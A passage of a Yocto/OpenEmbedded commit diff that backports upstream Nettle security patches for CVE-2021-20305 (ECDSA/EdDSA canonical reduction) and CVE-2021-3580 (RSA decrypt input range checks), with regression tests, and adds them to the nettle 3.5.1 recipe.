+- ecc_mod_mul (p, t0, x1, z2);
+- if (mpn_cmp (t0, p->m, p->size) >= 0)
+- mpn_sub_n (t0, t0, p->m, p->size);
+-
+- ecc_mod_mul (p, t1, x2, z1);
+- if (mpn_cmp (t1, p->m, p->size) >= 0)
+- mpn_sub_n (t1, t1, p->m, p->size);
++ ecc_mod_mul_canonical (p, t0, x1, z2, t0);
++ ecc_mod_mul_canonical (p, t1, x2, z1, t1);
+
+ return mpn_cmp (t0, t1, p->size) == 0;
+
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 15:19:19 +0100
+Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
+
+* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+to compute the scalars used for ecc multiplication.
+* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+triggers an assert on 64-bit platforms, without above fix.
+* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+the same signature.
+
+(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
+CVE: CVE-2021-20305 dep3
+[Minor fixup on _nettle_secp_224r1]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ ecc-ecdsa-verify.c | 4 ++--
+ testsuite/ecdsa-sign-test.c | 13 +++++++++++++
+ testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
+ 4 files changed, 44 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 2a9217a6..63848f53 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,7 +1,15 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+#+ to compute the scalars used for ecc multiplication.
+#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+#+ triggers an assert on 64-bit platforms, without above fix.
+#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating
+#+ the same signature.
+#+
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/ecc-ecdsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
++++ nettle-3.5.1/ecc-ecdsa-verify.c
+@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
+
+ /* u1 = h / s, P1 = u1 * G */
+ ecc_hash (&ecc->q, hp, length, digest);
+- ecc_modq_mul (ecc, u1, hp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
+
+ /* u2 = r / s, P2 = u2 * Y */
+- ecc_modq_mul (ecc, u2, rp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
+
+ /* Total storage: 5*ecc->p.size + ecc->mul_itch */
+ ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
+Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
+@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Producing the signature for corresponding test in
++ ecdsa-verify-test.c, with special u1 and u2. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "99b5b787484def12894ca507058b3bf5"
++ "43d72d82fa7721d2e805e5e6",
++ "2",
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* Test cases for the smaller groups, verified with a
+ proof-of-concept implementation done for Yubico AB. */
+ test_ecdsa (&_nettle_secp_192r1,
+Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
+@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Corresponds to nonce k = 2 and private key z =
++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
++ hash are chosen so that intermediate scalars in the verify
++ equations are u1 = 0x6b245680e700, u2 =
++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical
++ reduction of the scalars. Bug caused by missing canonical
++ reduction reported by Guido Vranken. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "9e7e6cc6b1bdfa8ee039b66ad85e5490"
++ "7be706a900a3cba1c8fdd014", /* x */
++ "74855db3f7c1b4097ae095745fc915e3"
++ "8a79d2a1de28f282eafb22ba", /* y */
++
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* From RFC 4754 */
+ test_ecdsa (&_nettle_secp_256r1,
+ "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
+Backport of:
+
+From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:27:50 +0100
+Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
+
+* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+canonical range.
+
+(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
+CVE: CVE-2021-20305 dep4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ ecc-ecdsa-sign.c | 3 +--
+ 2 files changed, 4 insertions(+), 2 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 63848f53..fb2d7f66 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+#+ canonical range.
+#+
+# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+# * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+--- a/ecc-ecdsa-sign.c
++++ b/ecc-ecdsa-sign.c
+@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
+
+ ecc_modq_mul (ecc, tp, zp, rp);
+ ecc_modq_add (ecc, hp, hp, tp);
+- ecc_modq_mul (ecc, tp, hp, kinv);
++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
+
+- mpn_copyi (sp, tp, ecc->p.size);
+ #undef P
+ #undef hp
+ #undef kinv
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:42:21 +0100
+Subject: [PATCH] Similar fix for eddsa.
+
+* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+reduced. Two of the three call sites need that.
+
+(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
+
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
+CVE: CVE-2021-20305
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ eddsa-hash.c | 10 +++++++---
+ 2 files changed, 10 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5f8a22c2..ce330831 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+#+ reduced. Two of the three call sites need that.
+#+
+# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+#
+Index: nettle-3.5.1/eddsa-hash.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-hash.c
++++ nettle-3.5.1/eddsa-hash.c
+@@ -46,7 +46,12 @@ void
+ _eddsa_hash (const struct ecc_modulo *m,
+ mp_limb_t *rp, const uint8_t *digest)
+ {
++ mp_limb_t cy;
+ size_t nbytes = 1 + m->bit_size / 8;
+ mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
+ m->mod (m, rp);
++ mpn_copyi (rp + m->size, rp, m->size);
++ /* Ensure canonical reduction. */
++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, rp + m->size, m->size);
+ }
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
+From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:31:39 +0200
+Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
+
+Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
+
+(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 17 +++++++++-
+ rsa-decrypt-tr.c | 7 ++---
+ rsa-internal.h | 4 +--
+ rsa-sec-decrypt.c | 9 ++++--
+ rsa-sign-tr.c | 61 +++++++++++++++++-------------------
+ testsuite/rsa-encrypt-test.c | 14 ++++++++-
+ 6 files changed, 69 insertions(+), 43 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+ TMP_GMP_ALLOC (em, key->size);
++ mpz_limbs_copy(m, gibberish, key_limb_size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, key_limb_size);
+
+Index: nettle-3.5.1/rsa-internal.h
+===================================================================
+--- nettle-3.5.1.orig/rsa-internal.h
++++ nettle-3.5.1/rsa-internal.h
+@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
+ mp_limb_t *scratch);
+
+ /* Safe side-channel silent variant, using RSA blinding, and checking the
+- * result after CRT. */
++ * result after CRT. In-place calls, with x == m, is allowed. */
+ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn);
++ mp_limb_t *x, const mp_limb_t *m);
+
+ #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ /* We need a copy because m can be shorter than key_size,
++ * but _rsa_sec_compute_root_tr expect all inputs to be
++ * normalized to a key_size long buffer length */
++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
++
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
+
+Index: nettle-3.5.1/rsa-sign-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sign-tr.c
++++ nettle-3.5.1/rsa-sign-tr.c
+@@ -131,35 +131,34 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
++ mp_size_t nn;
+ mpz_t mz;
+ mpz_t xz;
+ int res;
+
+- mpz_init(mz);
+ mpz_init(xz);
+
+- mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
+- mpz_limbs_finish(mz, mn);
++ nn = mpz_size (pub->n);
+
+- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
++ mpz_roinit_n(mz, m, nn));
+
+ if (res)
+- mpz_limbs_copy(x, xz, mpz_size(pub->n));
++ mpz_limbs_copy(x, xz, nn);
+
+- mpz_clear(mz);
+ mpz_clear(xz);
+ return res;
+ }
+ #else
+ /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
+- returns the inverse (ri), for use by rsa_unblind. */
++ returns the inverse (ri), for use by rsa_unblind. Must have c != m,
++ no in-place operation.*/
+ static void
+ rsa_sec_blind (const struct rsa_public_key *pub,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
+- mp_size_t mn)
++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
+ {
+ const mp_limb_t *ep = mpz_limbs_read (pub->e);
+ const mp_limb_t *np = mpz_limbs_read (pub->n);
+@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
+
+ /* c = m*(r^e) mod n */
+ itch = mpn_sec_powm_itch(nn, ebn, nn);
+- i2 = mpn_sec_mul_itch(nn, mn);
++ i2 = mpn_sec_mul_itch(nn, nn);
+ itch = MAX(itch, i2);
+- i2 = mpn_sec_div_r_itch(nn + mn, nn);
++ i2 = mpn_sec_div_r_itch(2*nn, nn);
+ itch = MAX(itch, i2);
+ i2 = mpn_sec_invert_itch(nn);
+ itch = MAX(itch, i2);
+
+- TMP_GMP_ALLOC (tp, nn + mn + itch);
+- scratch = tp + nn + mn;
++ TMP_GMP_ALLOC (tp, 2*nn + itch);
++ scratch = tp + 2*nn;
+
+ /* ri = r^(-1) */
+ do
+@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
+ while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
+
+ mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
+- /* normally mn == nn, but m can be smaller in some cases */
+- mpn_sec_mul (tp, c, nn, m, mn, scratch);
+- mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
++ mpn_sec_mul (tp, c, nn, m, nn, scratch);
++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
+ mpn_copyi(c, tp, nn);
+
+ TMP_GMP_FREE (r);
+@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
+ TMP_GMP_FREE (tp);
+ }
+
+-/* m = c ri mod n */
++/* m = c ri mod n. Allows x == c. */
+ static void
+ rsa_sec_unblind (const struct rsa_public_key *pub,
+ mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
+@@ -299,7 +297,7 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
+ TMP_GMP_DECL (c, mp_limb_t);
+ TMP_GMP_DECL (ri, mp_limb_t);
+@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
+ size_t key_limb_size;
+ int ret;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
+ key is invalid and rejected by rsa_private_key_prepare. However,
+@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
+ }
+
+ assert(mpz_size(pub->n) == key_limb_size);
+- assert(mn <= key_limb_size);
+
+ TMP_GMP_ALLOC (c, key_limb_size);
+ TMP_GMP_ALLOC (ri, key_limb_size);
+ TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
+
+- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
++ rsa_sec_blind (pub, random_ctx, random, c, ri, m);
+
+- _rsa_sec_compute_root(key, c, x, scratch);
++ _rsa_sec_compute_root(key, x, c, scratch);
+
+- ret = rsa_sec_check_root(pub, c, x);
++ ret = rsa_sec_check_root(pub, x, c);
+
+- rsa_sec_unblind(pub, x, ri, c);
++ rsa_sec_unblind(pub, x, ri, x);
+
+ cnd_mpn_zero(1 - ret, x, key_limb_size);
+
+@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
+ mpz_t x, const mpz_t m)
+ {
+ TMP_GMP_DECL (l, mp_limb_t);
++ mp_size_t nn = mpz_size(pub->n);
+ int res;
+
+- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
+- TMP_GMP_ALLOC (l, l_size);
++ TMP_GMP_ALLOC (l, nn);
++ mpz_limbs_copy(l, m, nn);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
+- mpz_limbs_read(m), mpz_size(m));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
+ if (res) {
+- mp_limb_t *xp = mpz_limbs_write (x, l_size);
+- mpn_copyi (xp, l, l_size);
+- mpz_limbs_finish (x, l_size);
++ mp_limb_t *xp = mpz_limbs_write (x, nn);
++ mpn_copyi (xp, l, nn);
++ mpz_limbs_finish (x, nn);
+ }
+
+ TMP_GMP_FREE (l);
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,6 +19,7 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
++ mpz_t zero;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+@@ -101,6 +102,17 @@ test_main(void)
+ ASSERT(decrypted[decrypted_length] == after);
+ ASSERT(decrypted[0] == 'A');
+
++ /* Test zero input. */
++ mpz_init_set_ui (zero, 0);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, zero));
++ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+ mpz_add_ui (key.q, key.q, 2);
+@@ -112,6 +124,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
++ mpz_clear(zero);
+ free(decrypted);
+ }
+-
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
@@ -0,0 +1,163 @@
+From c80961c646b0962ab152619ac0a7c6a21850a380 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:32:38 +0200
+Subject: [PATCH 2/2] Add input check to rsa_decrypt family of functions.
+
+(cherry picked from commit 0ad0b5df315665250dfdaa4a1e087f4799edaefe)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ rsa-decrypt-tr.c | 4 ++++
+ rsa-decrypt.c | 10 ++++++++++
+ rsa-sec-decrypt.c | 4 ++++
+ rsa.h | 5 +++--
+ testsuite/rsa-encrypt-test.c | 38 ++++++++++++++++++++++++++++++------
+ 6 files changed, 62 insertions(+), 9 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,6 +52,10 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+Index: nettle-3.5.1/rsa-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt.c
++++ nettle-3.5.1/rsa-decrypt.c
+@@ -48,6 +48,16 @@ rsa_decrypt(const struct rsa_private_key
+ int res;
+
+ mpz_init(m);
++
++ /* First check that input is in range. Since we don't have the
++ public key available here, we need to reconstruct n. */
++ mpz_mul (m, key->p, key->q);
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, m) >= 0)
++ {
++ mpz_clear (m);
++ return 0;
++ }
++
+ rsa_compute_root(key, m, gibberish);
+
+ res = pkcs1_decrypt (key->size, m, length, message);
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -55,6 +55,10 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_DECL (em, uint8_t);
+ int res;
+
++ /* First check that input is in range. */
++ if (mpz_sgn (gibberish) < 0 || mpz_cmp (gibberish, pub->n) >= 0)
++ return 0;
++
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+Index: nettle-3.5.1/rsa.h
+===================================================================
+--- nettle-3.5.1.orig/rsa.h
++++ nettle-3.5.1/rsa.h
+@@ -428,13 +428,14 @@ rsa_sec_decrypt(const struct rsa_public_
+ size_t length, uint8_t *message,
+ const mpz_t gibberish);
+
+-/* Compute x, the e:th root of m. Calling it with x == m is allowed. */
++/* Compute x, the e:th root of m. Calling it with x == m is allowed.
++ It is required that 0 <= m < n. */
+ void
+ rsa_compute_root(const struct rsa_private_key *key,
+ mpz_t x, const mpz_t m);
+
+ /* Safer variant, using RSA blinding, and checking the result after
+- CRT. */
++ CRT. It is required that 0 <= m < n. */
+ int
+ rsa_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,11 +19,12 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
+- mpz_t zero;
++ mpz_t bad_input;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+ mpz_init(gibberish);
++ mpz_init(bad_input);
+
+ knuth_lfib_init(&lfib, 17);
+
+@@ -103,15 +104,40 @@ test_main(void)
+ ASSERT(decrypted[0] == 'A');
+
+ /* Test zero input. */
+- mpz_init_set_ui (zero, 0);
++ mpz_set_ui (bad_input, 0);
+ decrypted_length = msg_length;
+- ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_decrypt_tr(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- &decrypted_length, decrypted, zero));
++ &decrypted_length, decrypted, bad_input));
+ ASSERT(!rsa_sec_decrypt(&pub, &key,
+ &lfib, (nettle_random_func *) knuth_lfib_random,
+- decrypted_length, decrypted, zero));
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is slightly larger than n */
++ mpz_add(bad_input, gibberish, pub.n);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
++ ASSERT(decrypted_length == msg_length);
++
++ /* Test input that is considerably larger than n */
++ mpz_mul_2exp (bad_input, pub.n, 100);
++ mpz_add (bad_input, bad_input, gibberish);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, bad_input));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, bad_input));
+ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+@@ -124,6 +150,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
+- mpz_clear(zero);
++ mpz_clear(bad_input);
+ free(decrypted);
+ }
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index d92db0ef95..192fd295e9 100644
--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "A low level cryptographic library"
+DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
+DESCRIPTION = "It tries to solve a problem of providing a common set of \
+cryptographic algorithms for higher-level applications by implementing a \
+context-independent set of cryptographic algorithms"
SECTION = "libs"
LICENSE = "LGPLv3+ | GPLv2+"
@@ -14,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
file://Add-target-to-only-build-tests-not-run-them.patch \
file://run-ptest \
file://check-header-files-of-openssl-only-if-enable_.patch \
+ file://CVE-2021-3580_1.patch \
+ file://CVE-2021-3580_2.patch \
+ file://CVE-2021-20305-1.patch \
+ file://CVE-2021-20305-2.patch \
+ file://CVE-2021-20305-3.patch \
+ file://CVE-2021-20305-4.patch \
+ file://CVE-2021-20305-5.patch \
"
